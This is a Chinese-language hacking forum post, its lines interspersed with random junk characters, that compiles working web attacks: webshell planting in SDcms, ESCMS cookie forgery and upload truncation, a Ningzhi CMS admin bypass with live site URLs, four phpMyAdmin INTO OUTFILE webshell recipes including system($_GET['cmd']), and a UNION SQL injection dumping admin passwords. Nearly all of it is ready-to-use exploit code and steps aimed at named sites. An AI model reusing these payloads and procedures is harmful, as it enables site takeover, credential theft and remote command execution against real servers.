<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">5 {! P5 \. q0 }% h$ U
Upload a new file:<br>
" z4 S1 S2 L) U* u% T6 T<input type="file" name="NewFile" size="50"><br>/ i/ u1 j4 O; l, I
<input id="btnUpload" type="submit" value="Upload">2 a/ ]6 Z3 F4 u5 y9 `# U
</form>( E: [, } ]9 m O. r. ~
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------" ^5 p$ j; U! H1 Y5 @) b
c/ G9 ?: S7 _' c$ \! W
SDcms 后台拿webshell% ^! c, y ?6 {7 v
1 a% D2 J5 p/ P Q第一种方法:7 c7 y @! [) ^, j% U; n
进入后台-->系统管理-->系统设置-->系统设置->网站名称;6 Z% {. ?8 N% @6 F# ~. Y5 A
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx, Y! _$ e" a) U2 t: J5 q5 F
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
7 [0 k( n. l% B* W' s. T4 N第二种方法:7 F1 [' c* T" c$ Z, ^
进入后台-->系统管理-->系统设置-->系统设置->上传设置;! C5 ~. |# `+ ?. C/ l
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!$ i' x3 W, O% k
第三种方法:6 h! Y: I: Z! {( b" n5 v
进入后台-->界面管理-->模板文件管理-->创建文件
# y; U3 U+ Z. o+ Y文件名写入getshell.ashx
: u: q/ w9 `# e8 _6 }) V) {9 t7 J' W内容写入下面内容:
7 [5 p# x2 n+ U) V1 F5 V6 c; N/====================复制下面的=========================/
) _) }6 ?7 t/ @8 t# d* N<%@ WebHandler Language="C#" Class="Handler" %>
3 o7 p" M* a$ f8 ?3 a9 busing System;
# w: n2 q W/ y: Y% M( a7 rusing System.Web;( H9 @: {' ?$ p: h2 p4 o3 o: i
using System.IO;
* N# x% o6 S* g2 r2 n- n" ]* N rpublic class Handler : IHttpHandler {( e; n9 r+ g/ D) R" J
public void ProcessRequest (HttpContext context) {
( |. D" S! S3 `7 \# F7 A) V Wcontext.Response.ContentType = "text/plain";
* I3 j$ R0 K7 N6 n+ g8 _2 F9 EStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));! m( G* O7 u5 n+ m5 _, _* m
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");$ R+ K: _3 Z# H
file1.Flush();4 G4 d9 [) u% t' Q
file1.Close();
) r' D$ x- Z, a% O" h0 w0 y/ i2 m}' \5 F7 U7 {4 O4 p
public bool IsReusable {
1 X1 T4 c2 p. ]. O( cget {
$ R/ t* y7 c2 I4 v; V7 b- Yreturn false;
* {6 \1 ?7 ^6 A3 A}0 ?" R% f, x3 F5 S
}
# V- e4 ~* Q) l. S% ~}9 \5 Y" ~$ R! S5 b4 o' s6 u. N
/=============================================/
, f7 _1 l+ O4 G8 u访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
* p4 _" o0 r3 G会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接& T8 f* a! I! t1 W* L
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: l C3 {: y0 T/ ? K
: ~$ N8 M0 z& `
ESCMS网站管理系统0day, l- B) X% I9 C3 | k. `
# |" T* K$ e* A9 j1 e1 G. n, p* n
后台登陆验证是通过admin/check.asp实现的
! x7 a% W0 F2 b+ T
0 Z/ k1 K( t* B$ c' x& u" s首先我们打开http://target.com/admin/es_index.html
# g3 ~0 f; ^; h, U然后在COOKIE结尾加上
+ M* C- P0 b/ M; ESCMS$_SP2=ES_admin=st0p;/ ?- W6 e5 D# D' O3 q1 H' c
修改,然后刷新* V8 h, i( q" U' `: I5 e
进后台了嘎..
8 Y6 ?- d% y4 J然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
* l# c) X% b; j: c, E' r* ~+ w% H& W& d9 O( Q5 B2 y
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.! ]) j& i0 K& G( [" \; D) S
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp3 \) x( H: @0 \
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..8 @% [9 Z. V9 Z2 `& V; M, p9 a! q
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了0 V* I2 y0 ?2 N5 x/ C7 c: n
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 Q. Z2 N6 l3 \" w7 q5 Y/ t; g& y3 n9 P! \$ }7 x
宁志网站管理系统后台无验证漏洞及修复 ~/ v. B! h, R; g; z2 r
# j; e$ h3 ?0 L8 h7 ^/ H& K& q) d网上搜了一下,好像没有发布.如有雷同纯粹巧合!
: r) W" e0 H1 r, g7 X& Y* ]官方网站:www.ningzhi.net" _4 R! h( M: y" Q1 r: x. j. N
学校网站管理系统 V.2011版本
% d5 d% { Z9 r+ `7 V Ehttp://down.chinaz.com/soft/29943.htm e2 H$ D" ]$ w# n
其它版本(如:政府版等),自行下载.
2 @0 y& n4 y6 A漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~# W3 v: N/ R2 ?0 g
login.asp代码如下:
" J7 a0 N. A3 z<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> . P+ M% u) C* G2 p5 O
manage.asp代码我就不帖出来了.反正也没验证.0 ?- w, e$ L$ j/ H9 k
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
% o& e5 O+ e9 I3 e; c L! z! k; H漏洞利用:8 {% p& w" ~( V/ U
直接访问http://www.0855.tv/admin/manage.asp
7 C& D# Z+ Z; }8 a4 w" V* n数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
. r6 ~; h0 l8 H- t----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. L* o9 Y; ^' \. B/ |6 X& S% V" _; c% T& w
phpmyadmin拿shell的四种方法总结及修复0 K3 ]8 u7 [" l! }/ c
) |. x( p7 j9 Q7 S" L方法一:. Q' j* h4 d) c$ q& ~7 A: T! L
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
1 l, u* z1 u6 Y; z) u3 K4 dINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');) O( b, O) O" E; x- |) M. V
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';2 o, d0 H# f' r; z1 i! h
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php5 G* m- K) P' n- W0 j
一句话连接密码:7on" K2 m3 y. ]& u. m
方法二:4 s4 {4 K! k( K$ \2 J
读取文件内容: select load_file('E:/xamp/www/s.php');# o. w7 w7 ?7 f. Z7 x( l$ C8 @
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
- v* H" a' h( } }: O% z) dcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'1 d% S* v$ {" F* q* u( s+ N
方法三:
1 i) |% `- o$ K/ k6 X2 KJhackJ版本 PHPmyadmin拿shell
& i) t0 q- l' G+ K# `& f1 fCreate TABLE study (cmd text NOT NULL);
3 t3 t5 D3 C) Q, e" G* b* wInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
; ^0 g/ L' I3 q9 m0 e. vselect cmd from study into outfile 'E:/wamp/www/7.php';( g. E: C0 C/ R* z/ C
Drop TABLE IF EXISTS study;
( m& P9 \' \( h<?php eval($_POST[cmd])?>
6 C( \ n* s/ N' n7 H* o5 P( s% L- hCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。1 O" k! a7 a. E. M f1 k
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1* j8 J/ a c$ Z2 p* R: Z k* Z
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
7 |& H/ u4 U9 K& G5 J6 |5 H0 oDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。3 I2 @3 B: P: K- E
方法四:9 @ k5 e3 D0 g7 Z* O4 Z
select load_file('E:/xamp/www/study.php');( ]4 p, z) Z& J# E7 p
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'& P5 ], \, m8 C# A7 ]9 `+ y& A
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
~4 p# K) @8 M-----------------------------------------------------------------------------------------------------------------------------------------------------------------------: _0 X- R3 t) R5 V" Y% I' r9 o: D
6 ~' x: ~9 y' ]0 K# w" JNO.001中学网站管理系统 Build 110628 注入漏洞8 p; R8 ]1 ?! B& f; P$ D
6 A7 F$ L5 i8 o- w$ o {* C
NO.001中学网站管理系统功能模块:' K* P4 x- q- [* z
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等2 l* T3 R6 f1 b! v# D- d
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息0 n/ v/ }8 p+ {7 ~! P5 v
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息3 ~2 _# r' q# S: q6 M; c- U9 q6 i8 _
4.视频图片管理:一级分类,动态添加视频或者图片等信息. m& S, z: N# F; ^2 P, ^ J
5.留言管理:对留言,修改,删除、回复等管理
1 y* ~! R* v8 x, S0 d- {6.校友频道:包括校友资料excel导出、管理等功能
4 W. K% [- T5 j$ U: L8 m% u7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页; u* Y9 ~' v1 l
默认后台:admin/login.asp
/ r1 H5 c3 X" ]- M0 c r官方演示:http://demo.001cms.net
. @; K# i9 `' e$ } t源码下载地址:http://down.chinaz.com/soft/30187.htm
3 K; ?7 y3 @/ P8 w6 uEXP:
: c- C+ H1 H8 O& G( n! d0 N" ], b$ |, ~union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
/ ]- O& {' B0 c* ~/ h4 L$ e7 a测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
4 Y C: ^& t( Q0 j- z. {+ X/ V8 s; Ngetshell:后台有备份,你懂的: X* }0 V! v) i8 B2 r3 b u
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
' C- C# \( S- ~, I8 N: ?------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对